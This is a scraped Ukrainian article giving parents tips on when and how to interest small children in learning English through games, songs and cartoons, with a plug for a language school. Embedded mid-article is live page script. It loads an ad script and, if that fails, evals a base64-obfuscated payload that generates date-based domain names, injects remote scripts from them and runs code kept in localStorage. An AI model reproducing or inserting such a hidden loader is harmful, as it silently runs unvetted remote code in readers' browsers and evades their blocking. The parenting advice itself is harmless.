Англійська для маленьких: як зацікавити дитину вивченням мови

Англійська мова з раннього дитинства може як стати успішним стартом, так і відбити бажання повертатися до неї в дорослому віці. Процес вивчення англійської для маленьких діток повинен не тільки бути корисним, а й приносити задоволення.

Починати навчання з дітками 3-5 років можна вдома, а вже з 6 років підібрати хорошу дитячу школу. На сайті нашої школи https://greencountry.com.ua/ є опис курсів для маленьких діток та їх різноманітність.


Вчіть англійську вдома, граючи з малюками

Н2 Коли починати вчити англійську з дитиною

Вік малюка, з якого можна починати вводити елементи іноземної, залежить від особливостей дитини. Деякі дітки готові сприймати англійську мову і з 2 років, а з деякими варто почекати до 5-6 років.

Ми вже писали про особливості англійської для маленьких діток, а тепер розберемо, коли варто починати вивчення другої мови. Психологи та педагоги не мають однозначної відповіді щодо універсального віку дитини, з якого варто почати вивчення англійської мови. Більшість кажуть, що англійську мову варто вчити не раніше, ніж у дитини сформується рідна мова. Малюк повинен називати всі кольори, рахувати до п’яти, говорити нескладними реченнями. Якщо дитині складно даються звуки або конструкції в рідній мові, не варто перевантажувати її англійською. Спробуйте вивчити віршик або пісеньку, щоб визначити, наскільки легка і цікава для маленького англійська мова. Сподобалося? Продовжуйте займатися, дитина готова до нових знань!

Н2 Як зацікавити малюка
var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Процес навчання маленьких дітей не повинен нагадувати нудні шкільні уроки або заняття для дорослих. Англійська мова — це інструмент, ось і використовуйте його для цікавих ігор і занять з малюком. Батькам простіше за все пробудити любов малечі до англійської, адже тільки вони знають, чим краще за все зацікавити дитину.

В Інтернеті є безліч ігор для прогулок і вдома. Вчіть віршики і розіграйте сценки — імпровізований театр чудова ідея. Пісеньки чудово тренують пам’ять і збагачують словниковий запас дитини, перекладати її не обов’язково, але показуйте рухами або на картинках, про що йде мова. На інтуїтивному рівні маленькі дітки чудово сприймають мову.

Англійська мова асоціюється зі школою? Грайте в клас, тільки роль вчителя нехай буде у дитини, а у вас роль учня. Грайте з ляльками, машинками, вигадуйте різні сценарії та називайте англійською предмети, дії чи кольори. Вводьте елементи іноземної мови у повсякденні речі.

Не впевнені у своєму рівні володіння англійською мовою? Вчіться разом! Вивчайте нові слова разом із малюком. Купіть барвисті книжки з картинками і словами, вони допоможуть швидше набрати лексичний запас. Дивіться разом мультфільми в оригіналі. Для себе увімкніть субтитри, щоб запам’ятовувати нові слова. Повторюйте новий матеріал цілими реченнями або фразами. Для початку батькам буде достатньо таких знань, а далі можете продовжити вивчати мову на курсах для дорослих.
(adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/anglijska-dlya-malenkih-yak-zatsikaviti-ditinu-vivchennyam-movi/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top